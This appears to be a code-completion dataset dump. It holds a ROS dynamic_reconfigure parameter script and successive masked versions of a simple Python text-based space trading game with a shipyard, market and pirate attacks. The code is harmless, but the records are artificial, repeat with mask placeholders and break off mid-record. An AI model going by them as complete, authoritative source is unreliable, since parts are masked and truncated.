gen.add("max_iterations", int_t, 0, "maximum iteration", 100, 1, 10000)
gen.add("min_indices", int_t, 0, "maximum iteration", 1000, 1, 10000)
exit (gen.generate (PACKAGE, "jsk_pcl_ros", "LineSegmentCollector"))
|
normal
|
{
"blob_id": "7127df5515e93e27b431c57bec1709475fec8388",
"index": 5238,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngen.add('segment_connect_normal_threshold', double_t, 0,\n 'threshold of normal to connect clusters', 0.9, 0.0, 1.0)\ngen.add('ewma_tau', double_t, 0,\n 'tau parameter of EWMA to connect clusters', 0.2, 0.0, 1.0)\ngen.add('outlier_threshold', double_t, 0, 'outlier threshold', 0.01, 0.0, 0.1)\ngen.add('max_iterations', int_t, 0, 'maximum iteration', 100, 1, 10000)\ngen.add('min_indices', int_t, 0, 'maximum iteration', 1000, 1, 10000)\nexit(gen.generate(PACKAGE, 'jsk_pcl_ros', 'LineSegmentCollector'))\n",
"step-3": "PACKAGE = 'jsk_pcl_ros'\n<mask token>\ngen = ParameterGenerator()\ngen.add('segment_connect_normal_threshold', double_t, 0,\n 'threshold of normal to connect clusters', 0.9, 0.0, 1.0)\ngen.add('ewma_tau', double_t, 0,\n 'tau parameter of EWMA to connect clusters', 0.2, 0.0, 1.0)\ngen.add('outlier_threshold', double_t, 0, 'outlier threshold', 0.01, 0.0, 0.1)\ngen.add('max_iterations', int_t, 0, 'maximum iteration', 100, 1, 10000)\ngen.add('min_indices', int_t, 0, 'maximum iteration', 1000, 1, 10000)\nexit(gen.generate(PACKAGE, 'jsk_pcl_ros', 'LineSegmentCollector'))\n",
"step-4": "PACKAGE = 'jsk_pcl_ros'\nfrom dynamic_reconfigure.parameter_generator_catkin import *\nfrom math import pi\ngen = ParameterGenerator()\ngen.add('segment_connect_normal_threshold', double_t, 0,\n 'threshold of normal to connect clusters', 0.9, 0.0, 1.0)\ngen.add('ewma_tau', double_t, 0,\n 'tau parameter of EWMA to connect clusters', 0.2, 0.0, 1.0)\ngen.add('outlier_threshold', double_t, 0, 'outlier threshold', 0.01, 0.0, 0.1)\ngen.add('max_iterations', int_t, 0, 'maximum iteration', 100, 1, 10000)\ngen.add('min_indices', int_t, 0, 'maximum iteration', 1000, 1, 10000)\nexit(gen.generate(PACKAGE, 'jsk_pcl_ros', 'LineSegmentCollector'))\n",
"step-5": "#!/usr/bin/env python\n\n# set up parameters that we care about\nPACKAGE = 'jsk_pcl_ros'\n\nfrom dynamic_reconfigure.parameter_generator_catkin import *;\n\nfrom math import pi\n\ngen = ParameterGenerator ()\ngen.add(\"segment_connect_normal_threshold\", double_t, 0,\n \"threshold of normal to connect clusters\", 0.9, 0.0, 1.0)\ngen.add(\"ewma_tau\", double_t, 0,\n \"tau parameter of EWMA to connect clusters\", 0.2, 0.0, 1.0)\ngen.add(\"outlier_threshold\", double_t, 0, \"outlier threshold\", 0.01, 0.0, 0.1)\ngen.add(\"max_iterations\", int_t, 0, \"maximum iteration\", 100, 1, 10000)\ngen.add(\"min_indices\", int_t, 0, \"maximum iteration\", 1000, 1, 10000)\n\nexit (gen.generate (PACKAGE, \"jsk_pcl_ros\", \"LineSegmentCollector\"))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
print('Enter 1 to jump to a agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cleanScreen():
for i in range(0, 50):
print('')
<|reserved_special_token_0|>
def shipyardMenu(player, planet):
while True:
cleanScreen()
print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')
player.printStats()
print('**********************************************************')
shipList = planet.getShipyard()
print('Available Ships:')
print('**********************************************************')
i = 0
for s in shipList:
print('Nr.:' + str(i) + ':' + s.toString())
i += 1
print('**********************************************************')
userInput = input(
'Enter the number you would like to by or x to leave:')
if userInput == 'x':
break
else:
ui = int(userInput)
if ui <= i:
if player.getCredits() > shipList[ui].getPrice():
if type(shipList[ui]) == FighterShip:
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].
getPrice())
player.updateMaintenance()
del shipList[ui]
else:
print('wrong number, try again ....')
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
print('Enter 1 to jump to a agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1, 3))
while notFinished:
cleanScreen()
if player.getCredits() < 0:
print(
'Sorry, but you ran out of credits and therefore lost the game in round,'
, turnCounter, '!')
break
print('**********************************************************')
print('Turn nr.', turnCounter,
'in this glorious space trading simulation')
player.printStats()
print('**********************************************************')
print('You are on Planet:', planet.getName())
print('**********************************************************')
print('Enter 1 to go to the shipyard')
print('Enter 2 to go to the market')
print('Enter 3 to go to the spaceport')
print('Enter exit to leave the game')
userinput = input('Your Input:')
if userinput == '1':
shipyardMenu(player, planet)
elif userinput == '2':
marketMenu(player, planet)
elif userinput == '3':
planet = spacePortMenu(player, planet)
else:
notFinished = False
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
turnCounter = 0
def cleanScreen():
for i in range(0, 50):
print('')
def spacePirates(player):
while True:
cleanScreen()
print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')
playerFirepower = player.getTotalFirepower()
piratesFirepower = int(playerFirepower * (1 + random.randint(-20,
20) / 100))
if random.randint(0, playerFirepower
) > playerFirepower / 3 and random.randint(0, piratesFirepower
) < piratesFirepower / 3 or playerFirepower == 0:
print('Damm, you got robbed by the pirates!')
print('You lost all your cargo and half your money!')
player.clearTech()
player.clearFood()
player.updateCargoUnits()
player.setCredits(player.getCredits() / 2)
else:
print('Lucky you! Your fighters drove them off!')
print('**********************************************************')
input('Hit enter to continue')
break
def shipyardMenu(player, planet):
while True:
cleanScreen()
print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')
player.printStats()
print('**********************************************************')
shipList = planet.getShipyard()
print('Available Ships:')
print('**********************************************************')
i = 0
for s in shipList:
print('Nr.:' + str(i) + ':' + s.toString())
i += 1
print('**********************************************************')
userInput = input(
'Enter the number you would like to by or x to leave:')
if userInput == 'x':
break
else:
ui = int(userInput)
if ui <= i:
if player.getCredits() > shipList[ui].getPrice():
if type(shipList[ui]) == FighterShip:
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].
getPrice())
player.updateMaintenance()
del shipList[ui]
else:
print('wrong number, try again ....')
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
print('Enter 1 to jump to a agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1, 3))
while notFinished:
cleanScreen()
if player.getCredits() < 0:
print(
'Sorry, but you ran out of credits and therefore lost the game in round,'
, turnCounter, '!')
break
print('**********************************************************')
print('Turn nr.', turnCounter,
'in this glorious space trading simulation')
player.printStats()
print('**********************************************************')
print('You are on Planet:', planet.getName())
print('**********************************************************')
print('Enter 1 to go to the shipyard')
print('Enter 2 to go to the market')
print('Enter 3 to go to the spaceport')
print('Enter exit to leave the game')
userinput = input('Your Input:')
if userinput == '1':
shipyardMenu(player, planet)
elif userinput == '2':
marketMenu(player, planet)
elif userinput == '3':
planet = spacePortMenu(player, planet)
else:
notFinished = False
print('***************************************')
print(' Welcome to StarSim')
print('***************************************')
name = input('Please enter your Name:')
player = Player.Player(name)
menu(player)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import Ship
import Player
import Planet
import random
from FighterShip import FighterShip
turnCounter = 0
def cleanScreen():
for i in range(0, 50):
print('')
def spacePirates(player):
while True:
cleanScreen()
print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')
playerFirepower = player.getTotalFirepower()
piratesFirepower = int(playerFirepower * (1 + random.randint(-20,
20) / 100))
if random.randint(0, playerFirepower
) > playerFirepower / 3 and random.randint(0, piratesFirepower
) < piratesFirepower / 3 or playerFirepower == 0:
print('Damm, you got robbed by the pirates!')
print('You lost all your cargo and half your money!')
player.clearTech()
player.clearFood()
player.updateCargoUnits()
player.setCredits(player.getCredits() / 2)
else:
print('Lucky you! Your fighters drove them off!')
print('**********************************************************')
input('Hit enter to continue')
break
def shipyardMenu(player, planet):
while True:
cleanScreen()
print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')
player.printStats()
print('**********************************************************')
shipList = planet.getShipyard()
print('Available Ships:')
print('**********************************************************')
i = 0
for s in shipList:
print('Nr.:' + str(i) + ':' + s.toString())
i += 1
print('**********************************************************')
userInput = input(
'Enter the number you would like to by or x to leave:')
if userInput == 'x':
break
else:
ui = int(userInput)
if ui <= i:
if player.getCredits() > shipList[ui].getPrice():
if type(shipList[ui]) == FighterShip:
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].
getPrice())
player.updateMaintenance()
del shipList[ui]
else:
print('wrong number, try again ....')
def spacePortMenu(player, planet):
global turnCounter
while True:
cleanScreen()
print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')
print('Enter 1 to jump to a agri planet (risk 5%)')
print('Enter 2 to jump to a tech planet (risk 10%)')
print('Enter 3 to jump to a war planet (risk 20%)')
userInput = input('Or enter x to exit:')
risk = 0
if userInput == 'x':
return planet
elif userInput == '1':
risk = 5
elif userInput == '2':
risk = 10
else:
risk = 20
if random.randint(0, 100) <= risk:
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:
cleanScreen()
print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')
player.printStats()
print('**********************************************************')
market = planet.getMarket()
print('Price for Food = ', market['Food'])
print('Price for Tech = ', market['Tech'])
print('**********************************************************')
userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')
str = ''
if userInput == '1':
str = 'Food'
elif userInput == '2':
str = 'Tech'
else:
break
print('**********************************************************')
max = 0
if market[str] * player.freeCargoUnits <= player.getCredits():
max = player.freeCargoUnits
else:
max = int(player.getCredits() / market[str])
print('Price for ' + str + ' = ', market[str])
secondInput = input(
'Would you like to buy (enter b) or sell (enter s)?')
if secondInput == 'b':
print('You can buy a maximum of', max, 'units')
nr = input('How much would you like to buy? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if player.getCredits() > market[str] * nr and nr <= max:
if str == 'Food':
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str] * nr)
player.updateCargoUnits()
elif str == 'Food':
print('You can sell a maximum of', player.getFood(), 'food units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getFood():
player.sellFood(nr)
player.setCredits(player.getCredits() + nr * market['Food']
)
else:
print('You can sell a maximum of', player.getTech(), 'tech units')
nr = input('How much would you like to sell? Or press x to exit')
if nr == 'x':
pass
else:
nr = int(nr)
if nr <= player.getTech():
player.sellTech(nr)
player.setCredits(player.getCredits() + nr * market['Tech']
)
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1, 3))
while notFinished:
cleanScreen()
if player.getCredits() < 0:
print(
'Sorry, but you ran out of credits and therefore lost the game in round,'
, turnCounter, '!')
break
print('**********************************************************')
print('Turn nr.', turnCounter,
'in this glorious space trading simulation')
player.printStats()
print('**********************************************************')
print('You are on Planet:', planet.getName())
print('**********************************************************')
print('Enter 1 to go to the shipyard')
print('Enter 2 to go to the market')
print('Enter 3 to go to the spaceport')
print('Enter exit to leave the game')
userinput = input('Your Input:')
if userinput == '1':
shipyardMenu(player, planet)
elif userinput == '2':
marketMenu(player, planet)
elif userinput == '3':
planet = spacePortMenu(player, planet)
else:
notFinished = False
print('***************************************')
print(' Welcome to StarSim')
print('***************************************')
name = input('Please enter your Name:')
player = Player.Player(name)
menu(player)
<|reserved_special_token_1|>
'''
Created on 17.05.2018
@author: markus
'''
import Ship
import Player
import Planet
import random
from FighterShip import FighterShip
turnCounter = 0
def cleanScreen():
for i in range(0,50):
print("")
def spacePirates(player):#space prites attack, their firepower is +/-20% of player firepower
while True:# loop
cleanScreen()
print("*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****")
playerFirepower = player.getTotalFirepower()
piratesFirepower = int(playerFirepower*(1+random.randint(-20,20)/100))
if ((random.randint(0,playerFirepower) > playerFirepower/3) and
(random.randint(0,piratesFirepower) < piratesFirepower/3) or (playerFirepower == 0)):
print("Damm, you got robbed by the pirates!")
print("You lost all your cargo and half your money!")
player.clearTech()
player.clearFood()
player.updateCargoUnits()
player.setCredits(player.getCredits()/2)
else:
print("Lucky you! Your fighters drove them off!")
print("**********************************************************")
input("Hit enter to continue")
break
def shipyardMenu(player, planet):
while True:# loop
cleanScreen()
print("*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****")
player.printStats()
print("**********************************************************")
shipList = planet.getShipyard()
print("Available Ships:")
print("**********************************************************")
i = 0
for s in shipList:
print("Nr.:"+str(i)+":"+s.toString())
i += 1
print("**********************************************************")
userInput = input("Enter the number you would like to by or x to leave:")
if (userInput == "x"):
break;
else:
ui = int(userInput)
if (ui <= i):
if(player.getCredits() > shipList[ui].getPrice()): #has enough money
if(type(shipList[ui]) == FighterShip):
player.addFighterShip(shipList[ui])
player.updateFirePower()
else:
player.addCargoShip(shipList[ui])
player.updateCargoUnits()
player.setCredits(player.getCredits() - shipList[ui].getPrice())
player.updateMaintenance()
del shipList[ui]
else:
print("wrong number, try again ....")
def spacePortMenu(player, planet):
global turnCounter
while True:# loop
cleanScreen()
print("****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****")
print("Enter 1 to jump to a agri planet (risk 5%)")
print("Enter 2 to jump to a tech planet (risk 10%)")
print("Enter 3 to jump to a war planet (risk 20%)")
userInput = input("Or enter x to exit:")
risk = 0
if (userInput == "x"):
return planet
elif (userInput == "1"):
risk = 5
elif(userInput == "2"):
risk = 10
else:
risk = 20
if (random.randint(0,100) <= risk):
spacePirates(player)
player.setCredits(player.getCredits() - player.getTotalMaintenance())
turnCounter += 1
return Planet.Planet(int(userInput))
def marketMenu(player, planet):
while True:# loop
cleanScreen()
print("*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******")
player.printStats()
print("**********************************************************")
market = planet.getMarket()
print("Price for Food = ",market["Food"])
print("Price for Tech = ",market["Tech"])
print("**********************************************************")
userInput = input("Enter 1 for Food, 2 for Tech or x for exit:")
str =""
if (userInput == "1"):
str = "Food"
elif(userInput == "2"):
str= "Tech"
else:
break
print("**********************************************************")
max = 0
if(market[str]*player.freeCargoUnits <= player.getCredits()):#enough credit?
max = player.freeCargoUnits
else:
max = int(player.getCredits()/market[str])
print("Price for "+str+" = ",market[str])
secondInput = input("Would you like to buy (enter b) or sell (enter s)?")
if (secondInput == "b"):#buying
print("You can buy a maximum of",max,"units")
nr = input("How much would you like to buy? Or press x to exit")
if (nr == "x"):
pass
else:
nr = int(nr)
if((player.getCredits() > market[str]*nr) and (nr <= max)): #has enough money and space
if (str == "Food"):
player.addFood(nr)
else:
player.addTech(nr)
player.setCredits(player.getCredits() - market[str]*nr)
player.updateCargoUnits()
else:#selling
if (str == "Food"):
print("You can sell a maximum of",player.getFood(),"food units")
nr = input("How much would you like to sell? Or press x to exit")
if (nr == "x"):
pass
else:
nr = int(nr)
if (nr <= player.getFood()):
player.sellFood(nr)
player.setCredits(player.getCredits() + nr*market["Food"])
else:
print("You can sell a maximum of",player.getTech(),"tech units")
nr = input("How much would you like to sell? Or press x to exit")
if (nr == "x"):
pass
else:
nr = int(nr)
if (nr <= player.getTech()):
player.sellTech(nr)
player.setCredits(player.getCredits() + nr*market["Tech"])
def menu(player):
global turnCounter
notFinished = True
planet = Planet.Planet(random.randint(1,3))
while notFinished:#main game loop
cleanScreen()
if (player.getCredits() < 0):
print("Sorry, but you ran out of credits and therefore lost the game in round,",turnCounter,"!")
break
print("**********************************************************")
print("Turn nr.",turnCounter,"in this glorious space trading simulation")
player.printStats()
print("**********************************************************")
print("You are on Planet:",planet.getName())
print("**********************************************************")
print("Enter 1 to go to the shipyard")
print("Enter 2 to go to the market")
print("Enter 3 to go to the spaceport")
print("Enter exit to leave the game")
userinput = input("Your Input:")
if (userinput == "1"):
shipyardMenu(player, planet)
elif (userinput == "2"):
marketMenu(player, planet)
elif (userinput == "3"):
planet = spacePortMenu(player, planet)
else:
notFinished = False
print("***************************************")
print(" Welcome to StarSim")
print("***************************************")
name = input("Please enter your Name:")
player = Player.Player(name)
menu(player)
|
flexible
|
{
"blob_id": "97611fef5faafe660c7640e4a5aec8456e52135c",
"index": 9960,
"step-1": "<mask token>\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef cleanScreen():\n for i in range(0, 50):\n print('')\n\n\n<mask token>\n\n\ndef shipyardMenu(player, planet):\n while True:\n cleanScreen()\n print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')\n player.printStats()\n print('**********************************************************')\n shipList = planet.getShipyard()\n print('Available Ships:')\n print('**********************************************************')\n i = 0\n for s in shipList:\n print('Nr.:' + str(i) + ':' + s.toString())\n i += 1\n print('**********************************************************')\n userInput = input(\n 'Enter the number you would like to by or x to leave:')\n if userInput == 'x':\n break\n else:\n ui = int(userInput)\n if ui <= i:\n if player.getCredits() > shipList[ui].getPrice():\n if type(shipList[ui]) == FighterShip:\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].\n getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print('wrong number, try again ....')\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1, 3))\n while notFinished:\n cleanScreen()\n if player.getCredits() < 0:\n print(\n 'Sorry, but you ran out of credits and therefore lost the game in round,'\n , turnCounter, '!')\n break\n print('**********************************************************')\n print('Turn nr.', turnCounter,\n 'in this glorious space trading simulation')\n player.printStats()\n print('**********************************************************')\n print('You are on Planet:', planet.getName())\n print('**********************************************************')\n print('Enter 1 to go to the shipyard')\n print('Enter 2 to go to the market')\n print('Enter 3 to go to the spaceport')\n print('Enter exit to leave the game')\n userinput = input('Your Input:')\n if userinput == '1':\n shipyardMenu(player, planet)\n elif userinput == 